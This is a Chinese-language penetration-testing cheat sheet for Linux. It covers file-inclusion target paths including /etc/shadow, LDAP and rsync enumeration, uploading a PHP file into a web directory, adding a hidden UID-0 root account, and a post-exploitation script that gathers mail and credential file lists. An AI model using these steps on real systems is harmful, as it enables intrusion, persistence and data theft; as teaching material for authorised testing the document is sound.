LINUX渗透与提权总结
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权方法,方便各位同学在授权的渗透测试中能够事半功倍。
Linux 系统下的一些常见路径(用于本地文件包含/任意文件读取时逐一尝试;httpd.conf、php.ini、my.cnf、config.inc.php 等配置文件常含数据库口令或网站绝对路径;/etc/shadow 通常仅 root 可读,能读到它本身就说明权限已经很高):
001
|
/etc/passwd
|
002
|
003
|
/etc/shadow
|
004
|
005
|
/etc/fstab
|
006
|
007
|
/etc/host.conf
|
008
|
009
|
/etc/motd
|
010
|
011
|
/etc/ld.so.conf
|
012
|
013
|
/var/www/htdocs/index.php
|
014
|
015
|
/var/www/conf/httpd.conf
|
016
|
017
|
/var/www/htdocs/index.html
|
018
|
019
|
/var/httpd/conf/php.ini
|
020
|
021
|
/var/httpd/htdocs/index.php
|
022
|
023
|
/var/httpd/conf/httpd.conf
|
024
|
025
|
/var/httpd/htdocs/index.html
|
026
|
027
|
/var/httpd/conf/php.ini
|
028
|
029
|
/var/www/index.html
|
030
|
031
|
/var/www/index.php
|
032
|
033
|
/opt/www/conf/httpd.conf
|
034
|
035
|
/opt/www/htdocs/index.php
|
036
|
037
|
/opt/www/htdocs/index.html
|
038
|
039
|
/usr/local/apache/htdocs/index.html
|
040
|
041
|
/usr/local/apache/htdocs/index.php
|
042
|
043
|
/usr/local/apache2/htdocs/index.html
|
044
|
045
|
/usr/local/apache2/htdocs/index.php
|
046
|
047
|
/usr/local/httpd2.2/htdocs/index.php
|
048
|
049
|
/usr/local/httpd2.2/htdocs/index.html
|
050
|
051
|
/tmp/apache/htdocs/index.html
|
052
|
053
|
/tmp/apache/htdocs/index.php
|
054
|
055
|
/etc/httpd/htdocs/index.php
|
056
|
057
|
/etc/httpd/conf/httpd.conf
|
058
|
059
|
/etc/httpd/htdocs/index.html
|
060
|
061
|
/www/php/php.ini
|
062
|
063
|
/www/php4/php.ini
|
064
|
065
|
/www/php5/php.ini
|
066
|
067
|
/www/conf/httpd.conf
|
068
|
069
|
/www/htdocs/index.php
|
070
|
071
|
/www/htdocs/index.html
|
072
|
073
|
/usr/local/httpd/conf/httpd.conf
|
074
|
075
|
/apache/apache/conf/httpd.conf
|
076
|
077
|
/apache/apache2/conf/httpd.conf
|
078
|
079
|
/etc/apache/apache.conf
|
080
|
081
|
/etc/apache2/apache.conf
|
082
|
083
|
/etc/apache/httpd.conf
|
084
|
085
|
/etc/apache2/httpd.conf
|
086
|
087
|
/etc/apache2/vhosts.d/00_default_vhost.conf
|
088
|
089
|
/etc/apache2/sites-available/default
|
090
|
091
|
/etc/phpmyadmin/config.inc.php
|
092
|
093
|
/etc/mysql/my.cnf
|
094
|
095
|
/etc/httpd/conf.d/php.conf
|
096
|
097
|
/etc/httpd/conf.d/httpd.conf
|
098
|
099
|
/etc/httpd/logs/error_log
|
100
|
101
|
/etc/httpd/logs/error.log
|
102
|
103
|
/etc/httpd/logs/access_log
|
104
|
105
|
/etc/httpd/logs/access.log
|
106
|
107
|
/home/apache/conf/httpd.conf
|
108
|
109
|
/home/apache2/conf/httpd.conf
|
110
|
111
|
/var/log/apache/error_log
|
112
|
113
|
/var/log/apache/error.log
|
114
|
115
|
/var/log/apache/access_log
|
116
|
117
|
/var/log/apache/access.log
|
118
|
119
|
/var/log/apache2/error_log
|
120
|
121
|
/var/log/apache2/error.log
|
122
|
123
|
/var/log/apache2/access_log
|
124
|
125
|
/var/log/apache2/access.log
|
126
|
127
|
/var/www/logs/error_log
|
128
|
129
|
/var/www/logs/error.log
|
130
|
131
|
/var/www/logs/access_log
|
132
|
133
|
/var/www/logs/access.log
|
134
|
135
|
/usr/local/apache/logs/error_log
|
136
|
137
|
/usr/local/apache/logs/error.log
|
138
|
139
|
/usr/local/apache/logs/access_log
|
140
|
141
|
/usr/local/apache/logs/access.log
|
142
|
143
|
/var/log/error_log
|
144
|
145
|
/var/log/error.log
|
146
|
147
|
/var/log/access_log
|
148
|
149
|
/var/log/access.log
|
150
|
151
|
/usr/local/apache/logs/access_log.old
|
152
|
153
|
/usr/local/apache/logs/error_log.old
|
154
|
155
|
/etc/php.ini
|
156
|
157
|
/bin/php.ini
|
158
|
159
|
/etc/init.d/httpd
|
160
|
161
|
/etc/init.d/mysql
|
162
|
163
|
/etc/httpd/php.ini
|
164
|
165
|
/usr/lib/php.ini
|
166
|
167
|
/usr/lib/php/php.ini
|
168
|
169
|
/usr/local/etc/php.ini
|
170
|
171
|
/usr/local/lib/php.ini
|
172
|
173
|
/usr/local/php/lib/php.ini
|
174
|
175
|
/usr/local/php4/lib/php.ini
|
176
|
177
|
/usr/local/php4/php.ini
|
178
|
179
|
/usr/local/php4/lib/php.ini
|
180
|
181
|
/usr/local/php5/lib/php.ini
|
182
|
183
|
/usr/local/php5/etc/php.ini
|
184
|
185
|
/usr/local/php5/php5.ini
|
186
|
187
|
/usr/local/apache/conf/php.ini
|
188
|
189
|
/usr/local/apache/conf/httpd.conf
|
190
|
191
|
/usr/local/apache2/conf/httpd.conf
|
192
|
193
|
/usr/local/apache2/conf/php.ini
|
194
|
195
|
/etc/php4.4/fcgi/php.ini
|
196
|
197
|
/etc/php4/apache/php.ini
|
198
|
199
|
/etc/php4/apache2/php.ini
|
200
|
201
|
/etc/php5/apache/php.ini
|
202
|
203
|
/etc/php5/apache2/php.ini
|
204
|
205
|
/etc/php/php.ini
|
206
|
207
|
/etc/php/php4/php.ini
|
208
|
209
|
/etc/php/apache/php.ini
|
210
|
211
|
/etc/php/apache2/php.ini
|
212
|
213
|
/web/conf/php.ini
|
214
|
215
|
/usr/local/Zend/etc/php.ini
|
216
|
217
|
/opt/xampp/etc/php.ini
|
218
|
219
|
/var/local/www/conf/php.ini
|
220
|
221
|
/var/local/www/conf/httpd.conf
|
222
|
223
|
/etc/php/cgi/php.ini
|
224
|
225
|
/etc/php4/cgi/php.ini
|
226
|
227
|
/etc/php5/cgi/php.ini
|
228
|
229
|
/php5/php.ini
|
230
|
231
|
/php4/php.ini
|
232
|
233
|
/php/php.ini
|
234
|
235
|
/PHP/php.ini
|
236
|
237
|
/apache/php/php.ini
|
238
|
239
|
/xampp/apache/bin/php.ini
|
240
|
241
|
/xampp/apache/conf/httpd.conf
|
242
|
243
|
/NetServer/bin/stable/apache/php.ini
|
244
|
245
|
/home2/bin/stable/apache/php.ini
|
246
|
247
|
/home/bin/stable/apache/php.ini
|
248
|
249
|
/var/log/mysql/mysql-bin.log
|
250
|
251
|
/var/log/mysql.log
|
252
|
253
|
/var/log/mysqlderror.log
|
254
|
255
|
/var/log/mysql/mysql.log
|
256
|
257
|
/var/log/mysql/mysql-slow.log
|
258
|
259
|
/var/mysql.log
|
260
|
261
|
/var/lib/mysql/my.cnf
|
262
|
263
|
/usr/local/mysql/my.cnf
|
264
|
265
|
/usr/local/mysql/bin/mysql
|
266
|
267
|
/etc/mysql/my.cnf
|
268
|
269
|
/etc/my.cnf
|
270
|
271
|
/usr/local/cpanel/logs
|
272
|
273
|
/usr/local/cpanel/logs/stats_log
|
274
|
275
|
/usr/local/cpanel/logs/access_log
|
276
|
277
|
/usr/local/cpanel/logs/error_log
|
278
|
279
|
/usr/local/cpanel/logs/license_log
|
280
|
281
|
/usr/local/cpanel/logs/login_log
|
282
|
283
|
/usr/local/cpanel/logs/stats_log
|
284
|
285
|
/usr/local/share/examples/php4/php.ini
|
286
|
287
|
/usr/local/share/examples/php/php.ini
|
288
|
289
|
/usr/local/tomcat5527/bin/version.sh
|
290
|
291
|
/usr/share/tomcat6/bin/startup.sh
|
292
|
293
|
/usr/tomcat6/bin/startup.sh
|
Linux 相关提权渗透技巧总结,一、LDAP 渗透技巧:
1
|
1.cat /etc/nsswitch.conf
|
查看名称服务查找顺序:passwd/shadow/group 行若为 `files ldap`,说明本地账号之外还会向 LDAP 查询,目标使用了 LDAP 认证。
1
|
2.less /etc/ldap.conf
|
2
|
3
|
base ou=People,dc=unix-center,dc=net
|
找到 base DN(ou,dc,dc)设置。新一些的系统里该配置也可能位于 /etc/openldap/ldap.conf、/etc/nslcd.conf 或 /etc/sssd/sssd.conf;注意其中的 binddn/bindpw 字段(以及仅 root 可读的 /etc/ldap.secret)可能直接给出绑定凭据。
3.查找管理员信息
匿名方式(注意:原写法带 -D 但不带密码,实际是“未认证简单绑定”,很多目录服务默认拒绝;真正的匿名查询应省略 -D。另外上面的 base 行是 ou=People,命令中的 cn=People 与之不符,已改为 ou=People)
1
|
ldapsearch -x -h 192.168.2.2 -b "cn=administrator,ou=People,dc=unix-center,dc=net"
|
有密码形式
1
|
ldapsearch -x -W -D "cn=administrator,ou=People,dc=unix-center,dc=net" -b "cn=administrator,ou=People,dc=unix-center,dc=net" -h 192.168.2.2
|
4.限制只返回 10 条记录(-z 为 sizelimit,-p 指定端口,默认 389;不带 -b 时使用 ldap.conf 中的 BASE)
1
|
ldapsearch -h 192.168.2.2 -p 389 -x -z 10 -b "ou=People,dc=unix-center,dc=net" "(objectClass=*)"
|
实战:
1
|
1.cat /etc/nsswitch.conf
|
查看名称服务查找顺序:passwd/shadow/group 行若为 `files ldap`,说明本地账号之外还会向 LDAP 查询,目标使用了 LDAP 认证。
1
|
2.less /etc/ldap.conf
|
2
|
3
|
base ou=People,dc=unix-center,dc=net
|
找到 base DN(ou,dc,dc)设置;同时留意文件中是否有 binddn/bindpw 字段。
3.查找管理员信息
匿名方式(真正的匿名查询应省略 -D;带 -D 不带密码是“未认证简单绑定”,很多服务器默认拒绝;DN 中的 People 容器按上面的 base 行应为 ou=People)
1
|
ldapsearch -x -h 192.168.2.2 -b "cn=administrator,ou=People,dc=unix-center,dc=net"
|
有密码形式
1
|
ldapsearch -x -W -D "cn=administrator,ou=People,dc=unix-center,dc=net" -b "cn=administrator,ou=People,dc=unix-center,dc=net" -h 192.168.2.2
|
4.限制只返回 10 条记录(-z 为 sizelimit,-p 指定端口,默认 389)
1
|
ldapsearch -h 192.168.2.2 -p 389 -x -z 10 -b "ou=People,dc=unix-center,dc=net" "(objectClass=*)"
|
渗透实战:
1.返回所有的属性
01
|
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
|
02
|
03
|
version: 1
|
04
|
05
|
dn: dc=ruc,dc=edu,dc=cn
|
06
|
07
|
dc: ruc
|
08
|
09
|
objectClass: domain
|
10
|
11
|
dn: uid=manager,dc=ruc,dc=edu,dc=cn
|
12
|
13
|
uid: manager
|
14
|
15
|
objectClass: inetOrgPerson
|
16
|
17
|
objectClass: organizationalPerson
|
18
|
19
|
objectClass: person
|
20
|
21
|
objectClass: top
|
22
|
23
|
sn: manager
|
24
|
25
|
cn: manager
|
26
|
27
|
dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
|
28
|
29
|
uid: superadmin
|
30
|
31
|
objectClass: inetOrgPerson
|
32
|
33
|
objectClass: organizationalPerson
|
34
|
35
|
objectClass: person
|
36
|
37
|
objectClass: top
|
38
|
39
|
sn: superadmin
|
40
|
41
|
cn: superadmin
|
42
|
43
|
dn: uid=admin,dc=ruc,dc=edu,dc=cn
|
44
|
45
|
uid: admin
|
46
|
47
|
objectClass: inetOrgPerson
|
48
|
49
|
objectClass: organizationalPerson
|
50
|
51
|
objectClass: person
|
52
|
53
|
objectClass: top
|
54
|
55
|
sn: admin
|
56
|
57
|
cn: admin
|
58
|
59
|
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
|
60
|
61
|
uid: dcp_anonymous
|
62
|
63
|
objectClass: top
|
64
|
65
|
objectClass: person
|
66
|
67
|
objectClass: organizationalPerson
|
68
|
69
|
objectClass: inetOrgPerson
|
70
|
71
|
sn: dcp_anonymous
|
72
|
73
|
cn: dcp_anonymous
|
2.只查看基对象本身(-s base,仅返回 base DN 这一条记录)
1
|
bash-3.00 # ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain
|
3.查询 rootDSE(base DN 留空,-s base)。这个匿名查询会暴露 namingContexts(真实的目录根)、支持的扩展/控制、SASL 机制、LDAP 协议版本、厂商版本以及 TLS 密码套件。就下面的输出而言,值得写进报告的点有:仍然启用 LDAPv2;SASL 只有 EXTERNAL/DIGEST-MD5;密码套件列表中包含 NULL、EXPORT、RC4、单 DES 等弱套件;vendorVersion 直接给出了产品与版本号。
001
|
bash-3.00 # ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
|
002
|
003
|
version: 1
|
004
|
005
|
dn:
|
006
|
007
|
objectClass: top
|
008
|
009
|
namingContexts: dc=ruc,dc=edu,dc=cn
|
010
|
011
|
supportedExtension: 2.16.840.1.113730.3.5.7
|
012
|
013
|
supportedExtension: 2.16.840.1.113730.3.5.8
|
014
|
015
|
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
|
016
|
017
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
|
018
|
019
|
supportedExtension: 2.16.840.1.113730.3.5.3
|
020
|
021
|
supportedExtension: 2.16.840.1.113730.3.5.5
|
022
|
023
|
supportedExtension: 2.16.840.1.113730.3.5.6
|
024
|
025
|
supportedExtension: 2.16.840.1.113730.3.5.4
|
026
|
027
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
|
028
|
029
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
|
030
|
031
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
|
032
|
033
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
|
034
|
035
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
|
036
|
037
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
|
038
|
039
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
|
040
|
041
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
|
042
|
043
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
|
044
|
045
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
|
046
|
047
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
|
048
|
049
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
|
050
|
051
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
|
052
|
053
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
|
054
|
055
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
|
056
|
057
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
|
058
|
059
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
|
060
|
061
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
|
062
|
063
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
|
064
|
065
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
|
066
|
067
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
|
068
|
069
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
|
070
|
071
|
supportedExtension: 1.3.6.1.4.1.1466.20037
|
072
|
073
|
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
|
074
|
075
|
supportedControl: 2.16.840.1.113730.3.4.2
|
076
|
077
|
supportedControl: 2.16.840.1.113730.3.4.3
|
078
|
079
|
supportedControl: 2.16.840.1.113730.3.4.4
|
080
|
081
|
supportedControl: 2.16.840.1.113730.3.4.5
|
082
|
083
|
supportedControl: 1.2.840.113556.1.4.473
|
084
|
085
|
supportedControl: 2.16.840.1.113730.3.4.9
|
086
|
087
|
supportedControl: 2.16.840.1.113730.3.4.16
|
088
|
089
|
supportedControl: 2.16.840.1.113730.3.4.15
|
090
|
091
|
supportedControl: 2.16.840.1.113730.3.4.17
|
092
|
093
|
supportedControl: 2.16.840.1.113730.3.4.19
|
094
|
095
|
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
|
096
|
097
|
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
|
098
|
099
|
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
|
100
|
101
|
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
|
102
|
103
|
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
|
104
|
105
|
supportedControl: 2.16.840.1.113730.3.4.14
|
106
|
107
|
supportedControl: 1.3.6.1.4.1.1466.29539.12
|
108
|
109
|
supportedControl: 2.16.840.1.113730.3.4.12
|
110
|
111
|
supportedControl: 2.16.840.1.113730.3.4.18
|
112
|
113
|
supportedControl: 2.16.840.1.113730.3.4.13
|
114
|
115
|
supportedSASLMechanisms: EXTERNAL
|
116
|
117
|
supportedSASLMechanisms: DIGEST-MD5
|
118
|
119
|
supportedLDAPVersion: 2
|
120
|
121
|
supportedLDAPVersion: 3
|
122
|
123
|
vendorName: Sun Microsystems, Inc.
|
124
|
125
|
vendorVersion: Sun-Java(tm)-System-Directory/6.2
|
126
|
127
|
dataversion: 020090516011411
|
128
|
129
|
netscapemdsuffix: cn=ldap://dc=webA:389
|
130
|
131
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
|
132
|
133
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
|
134
|
135
|
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
|
136
|
137
|
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
|
138
|
139
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
|
140
|
141
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
|
142
|
143
|
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
|
144
|
145
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
|
146
|
147
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
|
148
|
149
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
|
150
|
151
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
|
152
|
153
|
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
|
154
|
155
|
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|
156
|
157
|
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
|
158
|
159
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
|
160
|
161
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
|
162
|
163
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
|
164
|
165
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
|
166
|
167
|
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
|
168
|
169
|
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
|
170
|
171
|
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
|
172
|
173
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
|
174
|
175
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
|
176
|
177
|
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|
178
|
179
|
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
|
180
|
181
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
|
182
|
183
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
|
184
|
185
|
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
|
186
|
187
|
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
|
188
|
189
|
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
|
190
|
191
|
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
|
192
|
193
|
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
|
194
|
195
|
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
|
196
|
197
|
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
|
198
|
199
|
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
|
200
|
201
|
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
|
202
|
203
|
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
|
204
|
205
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
|
206
|
207
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
|
208
|
209
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
|
210
|
211
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
|
212
|
213
|
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
|
214
|
215
|
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
|
216
|
217
|
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
|
218
|
219
|
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
|
220
|
221
|
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
|
222
|
223
|
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
|
224
|
225
|
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
|
226
|
227
|
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
|
Linux 相关提权渗透技巧总结,二、NFS 渗透技巧:
列举 NFS 导出目录及允许挂载的客户端(showmount -e 列出的是导出列表而不是 IP;若导出给 * 且配置为 no_root_squash,则属于高危配置,应重点记录):
1
|
showmount -e ip
|
Linux 相关提权渗透技巧总结,三、rsync 渗透技巧:
1.查看 rsync 服务器上的模块列表(rsyncd 默认端口 873,主机后的两个冒号表示 rsync 协议;能匿名列出模块说明没有配置 auth users 或 list = no):
01
|
rsync 210.51.X.X::
|
02
|
03
|
finance
|
04
|
05
|
img_finance
|
06
|
07
|
auto
|
08
|
09
|
img_auto
|
10
|
11
|
html_cms
|
12
|
13
|
img_cms
|
14
|
15
|
ent_cms
|
16
|
17
|
ent_img
|
18
|
19
|
ceshi
|
20
|
21
|
res_img
|
22
|
23
|
res_img_c2
|
24
|
25
|
chip
|
26
|
27
|
chip_c2
|
28
|
29
|
ent_icms
|
30
|
31
|
games
|
32
|
33
|
gamesimg
|
34
|
35
|
media
|
36
|
37
|
mediaimg
|
38
|
39
|
fashion
|
40
|
41
|
res-fashion
|
42
|
43
|
res-fo
|
44
|
45
|
taobao-home
|
46
|
47
|
res-taobao-home
|
48
|
49
|
house
|
50
|
51
|
res-house
|
52
|
53
|
res-home
|
54
|
55
|
res-edu
|
56
|
57
|
res-ent
|
58
|
59
|
res-labs
|
60
|
61
|
res-news
|
62
|
63
|
res-phtv
|
64
|
65
|
res-media
|
66
|
67
|
home
|
68
|
69
|
edu
|
70
|
71
|
news
|
72
|
73
|
res-book
|
看相应的下级目录(注意一定要在目录后面添加上/)
1
|
rsync 210.51.X.X::htdocs_app/
|
2
|
3
|
rsync 210.51.X.X::auto/
|
4
|
5
|
rsync 210.51.X.X::edu/
|
2.下载rsync服务器上的配置文件
1
|
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
|
3.向上传 rsync 文件。注意:rsync 默认会覆盖远端已存在且内容不同的文件,如需确保不覆盖请加 --ignore-existing(并先用 --dry-run 验证);能匿名写入 web 目录模块说明该模块未设置 read only = yes 或 auth users,本身就是高危配置。另外下面上传的是 nothack.php,而验证 URL 写的是 nothack.txt,两者应保持一致。
1
|
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
|
2
|
3
|
http://app.finance.xxx.com/warn/nothack.txt
|
Linux 相关提权渗透技巧总结,四、squid 渗透技巧(检测 Squid 是否为可被滥用的开放代理。请求行中主机与路径之间不能有空格,请求后还要再回车一次发送空行;若返回 200 或对应服务的 banner 而不是 403,说明它会替你转发到任意主机/端口,例如用 :22 探测 SSH):
1
|
nc -vv 91ri.org 80
|
2
|
3
|
GET http://www.sina.com/ HTTP/1.0
|
4
|
5
|
GET http://www.sina.com:22/ HTTP/1.0
|
Linux 相关提权渗透技巧总结,五、SSH 端口转发(-R 把本机 127.0.0.1:22 反向映射到远端 ip 的 44 端口;远端要监听在非回环地址需 sshd 开启 GatewayPorts,-g 只对 -L 本地转发生效;-f -N 表示后台运行且不执行命令):
1
|
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
|
Linux 相关提权渗透技巧总结,六、joomla 渗透小技巧:
确定版本(下面的 URL 是 Joomla 1.5 默认安装附带的示例文章,能访问则基本可判定为 1.5.x;更可靠的做法是读取 administrator/manifests/files/joomla.xml 或 language/en-GB/en-GB.xml 中的 version 字段):
1
|
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47
|
重新设置密码(这是 Joomla 1.5 的密码重置令牌确认页,只对旧版 1.5.x 中重置令牌校验存在缺陷的版本有用;操作会实际修改管理员口令并留下痕迹,务必事先获得授权并在报告中记录):
1
|
index.php?option=com_user&view=reset&layout=confirm
|
Linux 相关提权渗透技巧总结,七、Linux 添加 UID 为 0 的 root 用户(-o 允许重复 UID;该账号会在 /etc/passwd 中以第二个 uid=0 出现,极易被基线检查发现,并且还需 passwd nothack 设置口令后才能登录;仅限授权测试使用并在测试结束后清理):
1
|
useradd -o -u 0 nothack
|
Linux 相关提权渗透技巧总结,八、FreeBSD 本地提权(前提是 sysctl vfs.usermount=1,即允许普通用户挂载文件系统;下面演示的是 7.3-RELEASE,是否适用于其他版本需自行确认):
01
|
[argp@julius ~]$ uname -rsi
|
02
|
03
|
* freebsd 7.3-RELEASE GENERIC
|
04
|
05
|
* [argp@julius ~]$ sysctl vfs.usermount
|
06
|
07
|
* vfs.usermount: 1
|
08
|
09
|
* [argp@julius ~]$ id
|
10
|
11
|
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
|
12
|
13
|
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
|
14
|
15
|
* [argp@julius ~]$ ./nfs_mount_ex
|
16
|
17
|
*
|
18
|
19
|
calling nmount()
|
tar 文件夹打包:
1、tar打包(注意:--exclude 需作为独立参数放在源路径之前,输出文件名不能用 * 通配;原写法会把“/home/public_html/--exclude=...”当成要打包的路径):
1
|
tar -cvf /tmp/public_html.tar --exclude='*.gif' --exclude='/xx/xx/*' /home/public_html/
|
2
|
3
|
alzip打包(韩国) alzip -a D:\WEB d:\web*.rar
|
{
注:
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
那么用这条比较好
1
|
tar -czf /tmp/public_html.tar.gz --exclude='*.gif' --exclude='/xx/xx/*' /home/public_html/
|
}
系统信息收集:
01
|
for linux:
|
02
|
03
|
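#!/bin/bash
# Host survey for a post-exploitation foothold: prints hardware, package,
# account, scheduler and network facts to stdout and bundles a copy of
# /var/mail plus "locate" hit-lists for credential/config file names into
# ./getsysinfo.tar.
# Usage: ./getinfo.sh > /tmp/sysinfo.txt
# NOTE(review): noisy (rpm -qa, locate, copying /var/mail) and leaves an
# archive on disk -- run only inside an authorised engagement and clean up.
#
# Fixes relative to the original listing:
#  - banners were written as `echo ####...`: an unquoted `#` starts a
#    comment, so every banner printed an empty line -- now quoted;
#  - the id line had unbalanced quotes; `ipconfig` is a Windows command
#    (`ifconfig`/`ip` here); `2>dev/null` created a file named dev/null
#    instead of discarding stderr; the `for` loop was missing `do`;
#  - scratch files lived at fixed names under /tmp (/tmp/getmail,
#    /tmp/password, /tmp/sysconfig) that any local user could pre-create or
#    symlink; they now live in a private mktemp directory.

work=$(mktemp -d /tmp/.sysinfo.XXXXXX) || exit 1

echo '#######geting sysinfo####'
echo '######usage: ./getinfo.sh >/tmp/sysinfo.txt'
echo '#######basic infomation##'
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
# package inventory: rpm on RHEL-like hosts, dpkg on Debian-like ones
rpm -qa 2>/dev/null
dpkg -l 2>/dev/null

###### copy the local mail spool ######
cp -a /var/mail "$work/getmail" 2>/dev/null
echo "u'r id is $(id)"

echo '###atq&crontab#####'
atq 2>/dev/null
crontab -l 2>/dev/null

echo '#####about var#####'
set

echo '#####about network###'
### the interesting part of a pentest; extend as needed ###
cat /etc/hosts
hostname
ifconfig -a 2>/dev/null || ip addr 2>/dev/null
arp -v 2>/dev/null || ip neigh 2>/dev/null

echo '########user####'
# accounts whose passwd line mentions "sh" (catches /bin/sh, /bin/bash, ... login shells)
grep -i sh /etc/passwd

echo '######service####'
chkconfig --list 2>/dev/null
for i in oracle mysql tomcat samba apache ftp; do
    grep -i "$i" /etc/passwd
done

# candidate credential and configuration files by name (relies on an updatedb index)
locate passwd   >"$work/password"  2>/dev/null
locate password >>"$work/password" 2>/dev/null
locate conf     >"$work/sysconfig" 2>/dev/null
locate config   >>"$work/sysconfig" 2>/dev/null
### maybe "tree /" is useful too ###

echo '##packing up#########'
# archive members are ./getmail, ./password, ./sysconfig
tar cvf getsysinfo.tar -C "$work" .
rm -rf "$work"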
|